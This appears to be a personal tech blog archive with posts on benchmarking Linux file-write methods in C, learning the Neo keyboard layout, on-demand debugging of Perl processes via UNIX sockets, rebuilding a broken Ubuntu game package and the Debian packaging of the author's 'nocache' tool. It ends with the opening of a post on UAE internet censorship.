So you want to write to a file real fast…

Or: A tale about Linux file write patterns.

I once wrote a custom core dump handler to be used with Linux’s core_pattern. It takes a core dump on STDIN plus a few arguments, and then writes the core to a predictable location on disk with a time stamp and suitable access rights. Core dumps tend to be rather large, and in general you don’t know in advance how much data you’ll write to disk. So I built in a safeguard: write a chunk of data to disk (say, 16MB) and then check with fstatfs() whether the disk still has more than a threshold of free capacity (say, 10GB). This way, a rapidly restarting and core-dumping application cannot cause “disk full” follow-up failures, which inevitably lead to a denial of service for most data handling services.
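The threshold check described above can be sketched in a few lines. This is only an illustration, not the code of the actual handler: the function name has_free_space and its return convention are made up here, and it assumes that "capacity" means the space available to unprivileged users.

```c
#include <stdint.h>
#include <sys/vfs.h>

/* Hypothetical helper: returns 1 if the file system that holds fd has more
 * than `threshold` bytes available to unprivileged users, 0 if not, and -1
 * if fstatfs() fails. */
int has_free_space(int fd, uint64_t threshold)
{
    struct statfs st;

    if (fstatfs(fd, &st) == -1)
        return -1;

    /* f_bavail: free blocks for non-root users; f_bsize: block size in bytes */
    uint64_t avail = (uint64_t) st.f_bavail * (uint64_t) st.f_bsize;
    return avail > threshold;
}
```

A handler would call this after every chunk, e.g. has_free_space(out, 10ULL << 30) for the 10GB threshold, and stop writing as soon as the result is not 1.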

So… how do we write a lot of data to disk really fast? – Let us maybe rephrase the question: How do we write data to disk in the first place? Let’s assume we have already opened file descriptors in and out, and we just want to copy everything from in to out.

One might be tempted to try something like this:

    ssize_t read_write(int in, int out)
    {
        ssize_t n, t = 0;
        char buf[1024];

        while((n = read(in, buf, 1024)) > 0) {
            t += write(out, buf, n);
        }

        return t;
    }

“But…!”, you cry out, “there’s so much wrong with this!” And you are right, of course:

- The return value n is not checked. It might be -1, e.g. because we have got a bad file descriptor, or because the syscall was interrupted.

- A call to write(out, buf, n) will – if it does not return -1 – write at least one byte, but we have no guarantee that it will actually write all n bytes to disk. So we have to loop the write until we have written n bytes.

An updated and semantically correct pattern reads like this (in a real program you’d have to do real error handling instead of assertions, of course):

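    /* filesize() is a helper from the full benchmark code, not shown here */
    ssize_t read_write_bs(int in, int out, ssize_t bs)
    {
        ssize_t w = 0, r = 0, t, n, m;
        char *buf = malloc(bs);

        assert(buf != NULL);
        t = filesize(in);

        while(r < t && (n = read(in, buf, bs))) {
            if(n == -1) { assert(errno == EINTR); continue; }
            r += n;    /* total bytes read so far */

            /* the r - w bytes not yet written sit at the end of the n bytes in buf */
            while(w < r && (m = write(out, buf + n - (r - w), (r - w)))) {
                if(m == -1) { assert(errno == EINTR); continue; }
                w += m;    /* total bytes written so far */
            }
            assert(w == r);    /* a write() returning 0 counts as a real error */
        }

        free(buf);
        return w;
    }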

We have a total number of bytes to read (t), the number of bytes already read (r), and the number of bytes already written (w). Only when t == r == w are we done (or if the input stream ends prematurely). Error checking is performed so that we restart interrupted syscalls and crash on real errors.
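For comparison, here is a minimal sketch of the same loop with error returns instead of assertions. It is not the benchmark code: the names write_all and copy_fd are invented for this example, and it simply copies until read() reports end of input rather than asking for the file size first.

```c
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>

/* Write exactly len bytes from buf to fd, restarting after EINTR and after
 * short writes. Returns 0 on success, -1 on error (errno is set). */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t m = write(fd, buf, len);
        if (m == -1) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += m;
        len -= (size_t) m;
    }
    return 0;
}

/* Copy from in to out until end of input, using a buffer of bs bytes.
 * Returns the total number of bytes copied, or -1 on error. */
ssize_t copy_fd(int in, int out, size_t bs)
{
    ssize_t n, total = 0;
    char *buf = malloc(bs);

    if (buf == NULL)
        return -1;

    while ((n = read(in, buf, bs)) != 0) {
        if (n == -1) {
            if (errno == EINTR)
                continue;          /* interrupted: just try again */
            total = -1;
            break;
        }
        if (write_all(out, buf, (size_t) n) == -1) {
            total = -1;
            break;
        }
        total += n;
    }

    int saved = errno;             /* free() may clobber errno */
    free(buf);
    errno = saved;
    return total;
}
```

Splitting out write_all() keeps the bookkeeping per chunk, so the outer loop only has to track the running total.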

What about the bs parameter? Of course you may have already noticed in the first example that we always copied 1024 bytes. Typically, a block on the file system is 4KB, so we are only writing quarter blocks, which is likely bad for performance. So we’ll try different block sizes and compare the results.

We can find out the file system’s block size like this (as usual, real error handling left out):

ssize_t block_size(int fd)

{

struct statfs st;

assert(fstatfs(fd, &st) != -1);

return (ssize_t) st.f_bsize;

}

OK, let’s do some benchmarks! (Full code is on GitHub.) For simplicity I’ll try things on my laptop computer with Ext3+dmcrypt and an SSD. This is “read a 128MB file and write it out”, repeated for different block sizes, timing each version three times and printing the best time in the first column. In parentheses you’ll see how much slower (in percent) that best time is than the best run of all methods:

    read+write 16bs     164ms  191ms  206ms
    read+write 256bs    167ms  168ms  187ms  (+  1.8%)
    read+write 4bs      169ms  169ms  177ms  (+  3.0%)
    read+write bs       184ms  191ms  200ms  (+ 12.2%)
    read+write 1k       299ms  317ms  329ms  (+ 82.3%)

Mh. Seems like multiples of the FS’s block sizes don’t really matter here. In some runs, the 16x blocksize is best, sometimes it’s the 256x. The only obvious point is that writing only a single block at once is bad, and writing fractions of a block at once is very bad indeed performance-wise.
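The measuring itself is simple enough to sketch. The following is not the harness from the GitHub repository, just an assumed minimal version of "time it a few times, keep the best, report the percentage over the overall best"; best_of and percent_slower are names made up for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <time.h>

/* Monotonic wall-clock time in milliseconds. */
static double now_ms(void)
{
    struct timespec ts;

    clock_gettime(CLOCK_MONOTONIC, &ts);
    return ts.tv_sec * 1000.0 + ts.tv_nsec / 1e6;
}

/* Call fn(arg) `runs` times; return the fastest run in milliseconds,
 * or -1.0 if runs is not positive. */
double best_of(int runs, void (*fn)(void *), void *arg)
{
    double best = -1.0;

    for (int i = 0; i < runs; i++) {
        double start = now_ms();
        fn(arg);
        double elapsed = now_ms() - start;
        if (best < 0.0 || elapsed < best)
            best = elapsed;
    }
    return best;
}

/* Percentage by which time t is slower than the overall best time. */
double percent_slower(double t, double best)
{
    return (t - best) / best * 100.0;
}
```

With the numbers from the table, percent_slower(167.0, 164.0) is roughly 1.8 and percent_slower(299.0, 164.0) roughly 82.3, matching the values in parentheses.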

Now what’s there to improve? “Surely it’s the overhead of using read() to get data,” I hear you saying, “Use mmap() for that!” So we come up with this:

    ssize_t mmap_write(int in, int out)
    {
        ssize_t w = 0, n;
        size_t len;
        char *p;

        len = filesize(in);
        p = mmap(NULL, len, PROT_READ, MAP_SHARED, in, 0);
        assert(p != MAP_FAILED);    /* mmap() signals failure with MAP_FAILED, not NULL */

        while(w < len && (n = write(out, p + w, (len - w)))) {
            if(n == -1) { assert(errno == EINTR); continue; }
            w += n;
        }

        munmap(p, len);
        return w;
    }

Admittedly, the pattern is simpler. But, alas, it is even a little bit slower! (YMMV)

    read+write 16bs     167ms  171ms  209ms
    mmap+write          186ms  187ms  211ms  (+ 11.4%)

“Surely copying around useless data is hurting performance,” I hear you say, “it’s 2014, use zero-copy already!” – OK. So basically there are two approaches for this on Linux: One cumbersome but rather old and known to work (splice), and then there is the new and shiny sendfile interface.

For the splice approach, since at least one end of a splice call must be a pipe (and in our case both are regular files), we need to create a pipe solely for the purpose of splicing data from in to the write end of the pipe, and then again splicing that same chunk from the read end to the out fd:

ssize_t pipe_splice(int in, int out)

{

size_t bs = 65536;

ssize_t w = 0, r = 0, t, n, m;

int pipefd[2];

int flags = SPLICE_F_MOVE | SPLICE_F_MORE;

assert(pipe(pipefd) != -1);

t = filesize(in);

while(r < t && (n = splice(in, NULL, pipefd[1], NULL, bs, flags))) {

if(n == -1) { assert(errno == EINTR); continue; }

r += n;

while(w < r && (m = splice(pipefd[0], NULL, out, NULL, bs, flags))) {

if(m == -1) { assert(errno == EINTR); continue; }

w += m;

}

}

close(pipefd[0]);

close(pipefd[1]);

return w;

}

“This is not true zero copy!”, I hear you cry, and it’s true, the ‘page stealing’ mechanism has been discontinued as of 2007. So what we get is an “in-kernel memory copy”, but at least the file contents don’t cross the kernel/userspace boundary twice unnecessarily (we don’t inspect it anyway, right?).

The sendfile() approach is more immediate and clean:

ssize_t do_sendfile(int in, int out)

{

ssize_t t = filesize(in);

off_t ofs = 0;

while(ofs < t) {

if(sendfile(out, in, &ofs, t - ofs) == -1) {

assert(errno == EINTR);

continue;

}

}

return t;

}

So… do we get an actual performance gain?

    sendfile            159ms  168ms  175ms
    pipe+splice         161ms  162ms  163ms  (+  1.3%)
    read+write 16bs     164ms  165ms  178ms  (+  3.1%)

“Yes! I knew it!” you say. But I’m lying here. Every time I execute the benchmark, a different approach is the fastest. Sometimes the read/write approach comes in first, ahead of the two others. So it seems that this is not really a performance saver, is it? I like the sendfile() semantics, though. But beware:

In Linux kernels before 2.6.33, out_fd must refer to a socket. Since Linux 2.6.33 it can be any file. If it is a regular file, then sendfile() changes the file offset appropriately.

Strangely, sendfile() works on regular files in the default Debian Squeeze Kernel (2.6.32-5) without problems. (Update 2015-01-17: Przemysław Pawełczyk, who in 2011 sent Changli Gao’s patch which re-enables this behaviour to stable@kernel.org for inclusion in Linux 2.6.32, wrote to me explaining how exactly it ended up being backported. If you’re interested, see this excerpt from his email.)
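If the code has to run on kernels where sendfile() refuses a regular file as destination, one option is to fall back to plain reads and writes when the call fails with EINVAL or ENOSYS. The following is a sketch under that assumption, not part of the benchmark; sendfile_or_copy and copy_path are hypothetical names, and fstat() stands in for the filesize() helper used above.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/sendfile.h>
#include <sys/stat.h>
#include <unistd.h>

/* Copy `len` bytes from the start of `in` to `out`. sendfile() is tried
 * first; if the kernel rejects it with EINVAL or ENOSYS, the rest is copied
 * with pread()/write(). Returns the number of bytes copied, or -1. */
ssize_t sendfile_or_copy(int in, int out, off_t len)
{
    off_t ofs = 0;
    int use_sendfile = 1;
    char buf[65536];

    while (ofs < len) {
        size_t left = (size_t) (len - ofs);
        ssize_t n;

        if (use_sendfile) {
            n = sendfile(out, in, &ofs, left);      /* advances ofs itself */
            if (n == -1 && (errno == EINVAL || errno == ENOSYS)) {
                use_sendfile = 0;                   /* fall back for the rest */
                continue;
            }
        } else {
            n = pread(in, buf, left < sizeof buf ? left : sizeof buf, ofs);
            for (ssize_t w = 0; n > 0 && w < n; ) {
                ssize_t m = write(out, buf + w, (size_t) (n - w));
                if (m == -1 && errno != EINTR)
                    return -1;
                if (m > 0)
                    w += m;
            }
            if (n > 0)
                ofs += n;
        }
        if (n == -1 && errno != EINTR)
            return -1;
        if (n == 0)
            break;                                  /* input shorter than len */
    }
    return (ssize_t) ofs;
}

/* Convenience wrapper: copy the file at src to dst (created or truncated). */
ssize_t copy_path(const char *src, const char *dst)
{
    struct stat st;
    ssize_t n = -1;
    int in = open(src, O_RDONLY);
    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0644);

    if (in != -1 && out != -1 && fstat(in, &st) == 0)
        n = sendfile_or_copy(in, out, st.st_size);
    if (in != -1)
        close(in);
    if (out != -1)
        close(out);
    return n;
}
```

The fallback uses pread() with an explicit offset because sendfile() with an offset pointer does not move the file position of in.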

“But,” I hear you saying, “the system has no clue what your intentions are, give it a few hints!” and you are probably right, that shouldn’t hurt:

void advice(int in, int out)

{

ssize_t t = filesize(in);

posix_fadvise(in, 0, t, POSIX_FADV_WILLNEED);

posix_fadvise(in, 0, t, POSIX_FADV_SEQUENTIAL);

}

But since the file is very probably fully cached, the performance is not improved significantly. “BUT you should supply a hint on how much you will write, too!” – And you are right. And this is where the story branches off into two cases: Old and new file systems.

I’ll just tell the kernel that I want to write t bytes to disk now, and please reserve space (I don’t care about a “disk full” that I could catch and act on):

void do_falloc(int in, int out)

{

ssize_t t = filesize(in);

posix_fallocate(out, 0, t);

}

I’m using my workstation’s SSD with XFS now (not my laptop any more). Suddenly everything is much faster, so I’ll simply run the benchmarks on a 512MB file so that it actually takes time:

    sendfile + advices + falloc           205ms  208ms  208ms
    pipe+splice + advices + falloc        207ms  209ms  210ms  (+  1.0%)
    sendfile                              226ms  226ms  229ms  (+ 10.2%)
    pipe+splice                           227ms  227ms  231ms  (+ 10.7%)
    read+write 16bs + advices + falloc    235ms  240ms  240ms  (+ 14.6%)
    read+write 16bs                       258ms  259ms  263ms  (+ 25.9%)

Wow, so this posix_fallocate() thing is a real improvement! It seems reasonable enough, of course: the file system can already prepare a sequence of blocks of the requested size, contiguous if possible. But wait! What about Ext3? Back to the laptop:

    sendfile                              161ms  171ms  194ms
    read+write 16bs                       164ms  174ms  189ms  (+  1.9%)
    pipe+splice                           167ms  170ms  178ms  (+  3.7%)
    read+write 16bs + advices + falloc    224ms  229ms  229ms  (+ 39.1%)
    pipe+splice + advices + falloc        229ms  239ms  241ms  (+ 42.2%)
    sendfile + advices + falloc           232ms  235ms  249ms  (+ 44.1%)

Bummer. That was unexpected. Why is that? Let’s check strace while we execute this program:

fallocate(1, 0, 0, 134217728) = -1 EOPNOTSUPP (Operation not supported)

...

pwrite(1, "\0", 1, 4095) = 1

pwrite(1, "\0", 1, 8191) = 1

pwrite(1, "\0", 1, 12287) = 1

pwrite(1, "\0", 1, 16383) = 1

...

What? Who does this? – Glibc does this! It sees the syscall fail and re-creates the semantics by hand. (Beware, Glibc code follows. Safe to skip if you want to keep your sanity.)

/* Reserve storage for the data of the file associated with FD. */

int

posix_fallocate (int fd, __off_t offset, __off_t len)

{

#ifdef __NR_fallocate

# ifndef __ASSUME_FALLOCATE

if (__glibc_likely (__have_fallocate >= 0))

# endif

{

INTERNAL_SYSCALL_DECL (err);

int res = INTERNAL_SYSCALL (fallocate, err, 6, fd, 0,

__LONG_LONG_PAIR (offset >> 31, offset),

__LONG_LONG_PAIR (len >> 31, len));

if (! INTERNAL_SYSCALL_ERROR_P (res, err))

return 0;

# ifndef __ASSUME_FALLOCATE

if (__glibc_unlikely (INTERNAL_SYSCALL_ERRNO (res, err) == ENOSYS))

__have_fallocate = -1;

else

# endif

if (INTERNAL_SYSCALL_ERRNO (res, err) != EOPNOTSUPP)

return INTERNAL_SYSCALL_ERRNO (res, err);

}

#endif

return internal_fallocate (fd, offset, len);

}

And you guessed it, internal_fallocate() just does a one-byte pwrite() into every block (at offsets 4095, 8191, … in the strace output above) until the space requirement is fulfilled. This is slowing things down considerably. This is bad. – “But other people just truncate the file! I saw this!”, you interject, and again you are right.

void enlarge_truncate(int in, int out)

{

ssize_t t = filesize(in);

ftruncate(out, t);

}

Indeed the truncate versions work faster on Ext3:

    pipe+splice + advices + trunc         157ms  158ms  160ms
    read+write 16bs + advices + trunc     158ms  167ms  188ms  (+  0.6%)
    sendfile + advices + trunc            164ms  167ms  181ms  (+  4.5%)
    sendfile                              164ms  171ms  193ms  (+  4.5%)
    pipe+splice                           166ms  167ms  170ms  (+  5.7%)
    read+write 16bs                       178ms  185ms  185ms  (+ 13.4%)

Alas, not on XFS. There, the fallocate() system call is just more performant. (You can also use xfsctl directly for that.) – And this is where the story ends.

In place of a sweeping conclusion, I’m a little bit disappointed that there seems to be no general way to say “I’ll write n bytes now, please be prepared”. Obviously, using posix_fallocate() on Ext3 hurts very much (this may be why cp is not employing it). So I guess the best solution is still something like this:

if(fallocate(out, 0, 0, len) == -1 && errno == EOPNOTSUPP)

ftruncate(out, len);
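Spelled out as a complete function, the two-liner might look like the sketch below. The name reserve_space and its return convention are assumptions of this example; the only addition to the snippet above is that an interrupted fallocate() is retried and the caller learns which path was taken.

```c
#define _GNU_SOURCE             /* for fallocate() */
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Try to reserve len bytes for fd. Returns 0 if fallocate() reserved the
 * space, 1 if the file system does not support it and the file was only
 * extended with ftruncate() (nothing is reserved then), -1 on error. */
int reserve_space(int fd, off_t len)
{
    int rc;

    do {
        rc = fallocate(fd, 0, 0, len);
    } while (rc == -1 && errno == EINTR);

    if (rc == 0)
        return 0;
    if (errno != EOPNOTSUPP)
        return -1;              /* a real error such as ENOSPC or EBADF */

    return ftruncate(fd, len) == -1 ? -1 : 1;
}
```

Calling fallocate() directly, rather than posix_fallocate(), is what avoids the slow Glibc emulation on file systems like Ext3.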

Maybe you have another idea how to speed up the writing process? Then drop me an email, please.

Update 2014-05-03: Coming back after a couple of days’ vacation, I found the post was on HackerNews and generated some 23k hits here. I corrected the small mistake in example 2 (as pointed out in the comments – thanks!). – I trust that the diligent reader will have noticed that this is not a complete survey of I/O hierarchy, file system or hard drive performance. It is, as the subtitle should have made clear, a “tale about Linux file write patterns”.

Update 2014-06-09: Sebastian pointed out an error in the mmap write pattern (the write should start at p + w, not at p). Also, the basic read/write pattern contained a subtle error. Tricky business – Thanks!



Switching to Neo

A year ago I started typing with the Neo layout instead of the US QWERTY layout I had used before. Guided by the field reports of other people who switched, which I found very helpful and whose ranks I hereby want to join, I kept a fairly regular log during the first days of my switch.

Day 1 (12 Aug): Wow, I feel completely helpless in front of my own computer. Every sentence I want to type takes me a minute or more. Entering passwords is a nightmare. Every keyboard shortcut that is normally just “in my fingers” goes nowhere; in Vim in particular I get nothing done. I even wreck a few configs because I unintentionally press the old “k” key, where “r” as in “replace” now lives. I wrote a first email (but in Kiswahili, i.e. with untypical letter sequences). Everything is so exhausting!

Day 2 (13 Aug): With great effort I can by now operate tmux and Vim at a rudimentary level. The words are trickling out, and some trigrams already flow quite smoothly. When I’m not at the computer, I sometimes unconsciously type words in my head; when I notice, I make an effort to think in Neo. In theory I know at least the first two layers by heart, but sometimes I still have to think for several seconds before I can start typing. For the third layer I bring up the NeoLayoutViewer when needed. Every now and then my concentration suddenly collapses and I hit the same wrong key five times in a row until I pull myself together and think. – All in all it is very much like learning a new language…

Day 3 (14 Aug): Everything goes a bit better and faster. Nothing really works without errors. Today I wrote TeX for my bachelor’s thesis, painfully slowly, and I have to say: I don’t see the real advantage there. On a US layout the important special characters are at least as easy to reach… (Current speed: 63 keystrokes per minute.)

Day 4 (15 Aug): Horror: seven hours at work, and I get nothing done, everything takes forever. No desire to write more.

Day 5 (16 Aug): Another day of work. Somehow everything works, but it feels like I could type more confidently and faster two days ago…

Day 9 (21 Aug): After not spending much time at the computer over the weekend, I had to sit down to the bachelor’s thesis again at the start of the week. By now I am no longer quite so frustrated, and some (even long) words already come out really smoothly. It’ll be fine. (By now approx. 120 KPM.)

Day 14 (26 Aug): Deadline: I had given myself until today to decide whether I want to keep typing Neo. I wouldn’t consider the experiment “failed”, but at 140 keystrokes per minute I’m still far behind what I managed with QWERTY. Various di- and trigrams come out very smoothly by now, but I have the feeling that I still have to type every word a few times before I can really do it. Tomorrow it gets serious, because I’m giving a training course and have to type in front of a projector for two days…

Day 104 (23 Nov): The muscle memory has long been there: I can no longer remember where the keys used to be; my fingers find their way quite naturally, day after day. It feels like I rarely mistype, but at about 330 keystrokes per minute my typing speed is still only about 2/3 of what it was before the switch.

What I came to appreciate early on is the Mod4 key, which activates the fourth layer: here you can navigate with the cursor keys, jump to the beginning and end of the line and delete characters, all without moving your hands. I use this very often in Vim’s insert mode as well, which is normally not considered “pure doctrine”: with Neo, however, you don’t have to reposition your hands and leave the home row, so it is much faster than switching modes twice. – Speaking of Vim: I would never have thought (and this was the only reason I hadn’t learned Dvorak earlier) that you can use Vim with completely rearranged keys. I even often navigate with hjkl, although the letters are arranged about as oddly for that as one could imagine. You get used to everything. :-)

Day 372 (19 Aug): Almost exactly a year ago I switched, and by now I have regained my old typing speed of just under 470 keystrokes per minute. That doesn’t really look like progress, at least at first glance. However, I believe that overall I type faster, better and more ergonomically: I never look at the keyboard any more, and thanks to the Mod4 key I only have to move my fingers minimally for arrow keys, Backspace, Escape and similar sequences. All in all, I’m quite happy with my switch.

A few notes on learning:

- As has often been noted, the easiest way is to just “jump in” and type nothing but Neo. Yes, the first days are exhausting. But you leave this intermediate state fairly quickly and don’t hang forever in the limbo of two systems. (It is the same effect as learning a new language from a book in your own country as opposed to simply speaking it where it is spoken.)

- It makes sense to have the NeoLayoutViewer or a printout of the layout at hand, especially in the first days. When entering passwords in particular you have no visual feedback!

- Don’t put stickers on the keys! Don’t look at the keyboard! Ideally buy a new keyboard as well (a double adjustment is easier), or at least use one that is made for touch typing. (I had already been using Das Keyboard before.)

A few technical remarks on the Neo layout:

- In my opinion it is a very good solution that characters which have different meanings in different contexts can also be typed in different ways. For example, when programming I type a dollar sign with Mod3+ö, i.e. on the special character layer. But when it comes to amounts of money, I stick to Shift+6, which is next to the euro sign. I also mostly type the hyphen via Mod3+d instead of using the one in the number row.

- I type Neo only on US keyboards. At first this is rather unusual and error-prone, because the right Mod3 key for special characters sits directly above the Enter key. In IRC especially I therefore often sent unfinished messages by accident at the beginning. On a German keyboard, however, this is not unproblematic either. – Also, there is no left Mod4 key, so I have not used the “numeric keypad” on that layer so far.

- For layers 5 and 6 with Greek symbols I have not found any use so far. If I need them in LaTeX, I still type the full name, e.g. \alpha.

Finally, I would like to address a somewhat philosophical dimension of this switch. The saying »Man gets used to everything« goes deeper than one might think. Within a few weeks I managed to carry out one of my central activities in a completely different way. That this is frustrating at the beginning (and these notes have reminded me quite clearly of how annoyed I was) is of course to be expected. But where there’s a will, there’s a way.

Just as the arrangement of letters on the keyboard is fairly arbitrary, and one can switch from one arrangement to another because neither contains an inherent “truth” about letters and sentences, one can also switch languages, grammars and systems of thought. I, for example, now regard the letters K and H as fairly similar, because I type them with the same finger and have often mixed them up. Other people probably cannot relate to that, and viewed objectively my sense of similarity is absurd. And yet effects of language processing on the perception of reality can be observed.

I believe that exactly this overturning of certain principles that are believed to be fixed, but are actually arbitrary, is very important for not aging mentally so quickly. A few ideas:

- Read books from cultures in which moral ground rules and forms of communication other than those of your own world dominate.

- Learn a language that does not categorize nouns by gender.

- Take a different path than the familiar one (physically or figuratively).

- Use a completely new programming language for a small side project.

- Try to express complex thoughts using only the 1,000 most used words (help).

- Use a non-Eurocentric map on which south points up (thoughts on this).

Or, in the words of aphorism no. 552 from Nietzsche’s Menschliches, Allzumenschliches I (Human, All Too Human), titled Das einzige Menschenrecht (“The only human right”):

He who strays from the conventional is the victim of the extraordinary; he who stays within the conventional is its slave. Either way, one is destroyed.

An on demand Debugging Technique for long-running Processes

Debugging long-running processes or server software is usually an “either–or”: Either you activate debugging and get huge log files that you rarely if ever look at and that take up a considerable amount of disk space, or you did not activate the debugging mode and thus cannot get to the debugging output to figure out what the program is doing right now.

There is a really nice quick and dirty non-invasive printf debugging technique that just does a printf on a non-existent file descriptor, so that you can view the messages by strace-ing the process and grepping for EBADF.
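To make the trick concrete, here is a minimal sketch in C (the snippets further down are Perl, this one is only meant to illustrate the technique referenced above). The descriptor number 999 and the name debug_printf are arbitrary choices for this example; all that matters is that the descriptor is never opened by the program.

```c
#include <errno.h>
#include <stdarg.h>
#include <stdio.h>
#include <unistd.h>

#define DEBUG_FD 999    /* assumption: a descriptor the program never opens */

/* Format a message and write() it to a descriptor that is not open. The
 * call fails with EBADF, but the message still shows up as the argument of
 * the write() syscall when the process is traced. */
ssize_t debug_printf(const char *fmt, ...)
{
    char msg[512];
    va_list ap;

    va_start(ap, fmt);
    int len = vsnprintf(msg, sizeof msg, fmt, ap);
    va_end(ap);

    if (len < 0)
        return -1;
    if ((size_t) len >= sizeof msg)
        len = sizeof msg - 1;   /* message was truncated to fit the buffer */

    return write(DEBUG_FD, msg, (size_t) len);
}
```

Something like strace -p <pid> -e trace=write 2>&1 | grep EBADF would then show the messages of a running process; when nobody is tracing, each call costs one failed syscall.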

I want to share here a few Perl code snippets for an approach that is a little neater IMO, yet a little bit more invasive. Consider a simple “server” doing some work, occasionally printing out a debug statement:

#!/usr/bin/perl

use strict;

use warnings;

sub Debug { }; # empty for now

while(1) {

Debug("Here I am!");

select undef, undef, undef, 0.1;

}

The idea is to create, on demand, a UNIX domain socket that the process can write debug information to, so that (possibly a few) other processes can read and print out the debug info received on that socket.

We introduce a “global” structure $DEBUG, and functions to initialize and destroy the socket, which is named debug-<pid-of-process> and placed in /tmp.

my $DEBUG = {

socket => undef,

conn => [],

last_check => 0,

};

sub Debug_Init {

use IO::Socket;

use Readonly;

Readonly my $SOCKET => "/tmp/debug-$$";

return if $DEBUG->{socket};

unlink $SOCKET;

my $s = IO::Socket::UNIX->new(

Type => IO::Socket::SOCK_STREAM,

Local => $SOCKET,

Listen => 1,

) or die $!;

$s->blocking(0);

$DEBUG->{socket} = $s;

}

sub Debug_Cleanup {

return unless $DEBUG->{socket};

my $path = $DEBUG->{socket}->hostpath;

undef $DEBUG->{socket};

unlink $path;

}

When the process receives a SIGUSR1, we call Debug_Init, and to be sure we’ll clean up the socket in case of normal exit:

$SIG{USR1} = \&Debug_Init;

END { Debug_Cleanup; }

The socket is in non-blocking mode, so trying to accept() new connections will not block. Now, whenever we want to print out a debugging statement, we check if anyone has requested the debugging socket via SIGUSR1. After the first connection is accepted, we’ll only check once every second for new connections. For every accepted connection, we send the debugging message to that peer. (Note that UNIX domain sockets with Datagram type sadly do not support broadcast messaging – otherwise this would probably be easier.)

In case sending the message fails (probably because the peer disconnected), we’ll remove that connection from the list. If the last connection goes, we’ll unlink the socket.

sub Debug {

return unless $DEBUG->{socket};

my $s = $DEBUG->{socket};

my $conn = $DEBUG->{conn};

my $msg = shift or return;

$msg .= "\n" unless $msg =~ /\n$/;

if(time > $DEBUG->{last_check}) {

while(my $c = $s->accept) {

$c->shutdown(IO::Socket::SHUT_RD);

push @$conn => $c;

}

$DEBUG->{last_check} = time if @$conn;

}

return unless @$conn;

for(@$conn) {

$_->send($msg, IO::Socket::MSG_NOSIGNAL) or undef $_;

}

@$conn = grep { defined } @$conn;

unless(@$conn) {

Debug_Cleanup();

}

}

Here’s a simple script to display the debugging info for a given PID, assuming it uses the setup described above:

#!/usr/bin/perl

use strict;

use warnings;

use IO::Socket;

my $pid = shift;

if(not defined $pid) {

print "usage: $0 <pid>\n";

exit(1);

}

kill USR1 => $pid or die $!;

my $path = "/tmp/debug-$pid";

select undef, undef, undef, 0.01 until -e $path;

my $s = IO::Socket::UNIX->new(

Type => IO::Socket::SOCK_STREAM,

Peer => $path,

) or die $!;

$s->shutdown(IO::Socket::SHUT_WR);

$| = 1;

while($s->recv(my $m, 4096)) {

print $m;

}

We can now start the server; no debugging happens. But as soon as we send a SIGUSR1 and attach to the (now present) debug socket, we can see the debug information:

$ perl server & ; sleep 10

[1] 19731

$ perl debug-process 19731

Here I am!

Here I am!

Here I am!

^C

When we hit Ctrl-C, the debug socket vanishes again.

In my opinion this is a really neat way to have a debugging infrastructure in place “just in case”.

So your favourite game segfaults

I’m at home fixing some things on my mother’s new laptop, including upgrading to the latest Ubuntu. (Usually that’s a bad idea, but in this case it came with an update to LibreOffice which repaired the hang it previously encountered when opening any RTF file. Which was a somewhat urgent matter to solve.)

But, alas, one of the games (five-or-more, formerly glines) broke and now segfaults on startup. Happens to be the one game that she likes to play every day. What to do? The binary packages linked here don’t work.

Here’s how to roll your own: Get the essential development libraries and the ones specifically required for five-or-more, also the checkinstall tool.

apt-get install build-essential dpkg-dev checkinstall

apt-get build-dep five-or-more

Change to a temporary directory, get the source:

apt-get source five-or-more

Then apply the fix, configure and compile it:

./configure

make

But instead of doing a make install, simply use sudo checkinstall. This will build a pseudo Debian package, so that at least removing it will be easier in case an update fixes the issue.

How can this be difficult to fix?! *grr*

“nocache” in Debian Testing

I’m very pleased to announce that a little program of mine called nocache has officially made it into the Debian distribution and migrated to Debian testing just a few days ago.

The tool started out as a small hack that employs mmap and mincore to check which blocks of a file are already in the Linux FS cache, and uses this info in intercepted versions of libc’s open/close syscall wrappers and related functions in an effort to restore the cache to its pristine state after every file access.
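The mmap/mincore check can be illustrated with a short sketch. This is not code taken from nocache; the function name cached_pages and its interface are made up for this example, which only counts how many pages of a file are currently resident.

```c
#define _DEFAULT_SOURCE         /* for mincore() */
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Count the pages of the file behind fd that are resident in the page
 * cache. Stores the file's total number of pages in *total. Returns the
 * number of resident pages, or -1 on error. */
long cached_pages(int fd, long *total)
{
    struct stat st;
    long page = sysconf(_SC_PAGESIZE);

    if (page <= 0 || fstat(fd, &st) == -1)
        return -1;

    size_t len = (size_t) st.st_size;
    size_t pages = (len + (size_t) page - 1) / (size_t) page;
    *total = (long) pages;
    if (pages == 0)
        return 0;               /* mmap() rejects a length of zero */

    /* Mapping the file does not read it; mincore() only inspects state. */
    void *p = mmap(NULL, len, PROT_READ, MAP_SHARED, fd, 0);
    if (p == MAP_FAILED)
        return -1;

    long resident = -1;
    unsigned char *vec = malloc(pages);
    if (vec != NULL && mincore(p, len, vec) == 0) {
        resident = 0;
        for (size_t i = 0; i < pages; i++)
            resident += vec[i] & 1;     /* lowest bit set: page is in core */
    }

    free(vec);
    munmap(p, len);
    return resident;
}
```

Taking such a snapshot before a file is used and comparing it afterwards tells which pages were pulled into the cache by the access.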

I only wrote this tool as a little “proof of concept”, but it seems there are people out there actually using this, which is nice.


My thanks go out to Dmitry who packaged and will be maintaining the tool for Debian – as well as the other people who engaged in the lively discussions in the issue tracker.

Update: Chris promptly provided an Arch Linux package, too! Thanks!

Internet Censorship in Dubai and the UAE

The internet is censored in the UAE. Not really bad like in China – it’s rather used to restrict access to “immoral content”. Because you know, the internet is full of porn and Danish people making fun of The Prophet. – Also, downloading Skype is forbidden (but using it is not).

I have investigated the censorship mechanism of one of the two big providers and will describe the techniques in use and how to effectively circumvent the block.

How it works

If you navigate to a “forbidden page” in the UAE, you’ll be presented with a screen warning you that it is illegal under the Internet Access Management Regulatory Policy to view that page.

